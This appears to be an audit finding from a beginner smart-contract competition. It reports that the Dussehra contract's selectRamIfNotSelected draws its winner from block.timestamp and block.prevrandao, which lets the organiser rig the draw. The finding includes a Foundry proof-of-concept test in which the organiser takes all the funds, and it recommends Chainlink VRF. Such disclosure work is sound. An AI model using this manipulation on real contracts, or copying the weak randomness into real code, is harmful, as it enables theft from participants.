First Flight #17: Dussehra
First Flight #17
Beginner FriendlyFoundryNFT
100 EXP
View results
Previous Next
Submission Details
Severity: low
Valid

Weak Pseudo Random Number Generation in `ChoosingRam::selectRamIfNotSelected`, the organiser can manipulate to win`

kazan

Description

the random number in selectRamIfNotSelected is calculated using block.timestamp, block.prevrandao which are not so random as expected, the organiser can manipulate this function for his/her own win.

Impact

The organiser can wait for the appropriate block.timestamp and block.prevrandao to call selectRamIfNotSelected. The selectedRam will be himself/herself. The organiser will take all the money.

Tools Used

  • Manual review

  • Slither

  • Foundry

PoC

Place this code into Dussehra.t.sol

function test_organiserManipulateToWin() public participants {
vm.startPrank(player3);
vm.deal(player3, 1 ether);
dussehra.enterPeopleWhoLikeRam{value: 1 ether}();
vm.stopPrank();
vm.startPrank(organiser);
vm.deal(organiser, 1 ether);
dussehra.enterPeopleWhoLikeRam{value: 1 ether}();
vm.warp(1728691200 + 2);
choosingRam.selectRamIfNotSelected();
vm.stopPrank();
uint256 random = uint256(keccak256(abi.encodePacked(block.timestamp, block.prevrandao))) % ramNFT.tokenCounter();
uint256 totalAmount = address(dussehra).balance;
vm.startPrank(organiser);
dussehra.killRavana();
dussehra.withdraw();
vm.stopPrank();
assertEq(organiser.balance, totalAmount);
}

Test pass, the organiser take all the money.

Recommendations

Do not use block.timestamp and block.prevrandao as sources of randomness. Use ChainLinkVRF instead.

Updates

Lead Judging Commences

bube Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Weak randomness in `ChoosingRam::selectRamIfNotSelected`

The organizer is trusted, but the function `ChoosingRam::selectRamIfNotSelected` uses a way to generate a random number that is not completely random.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.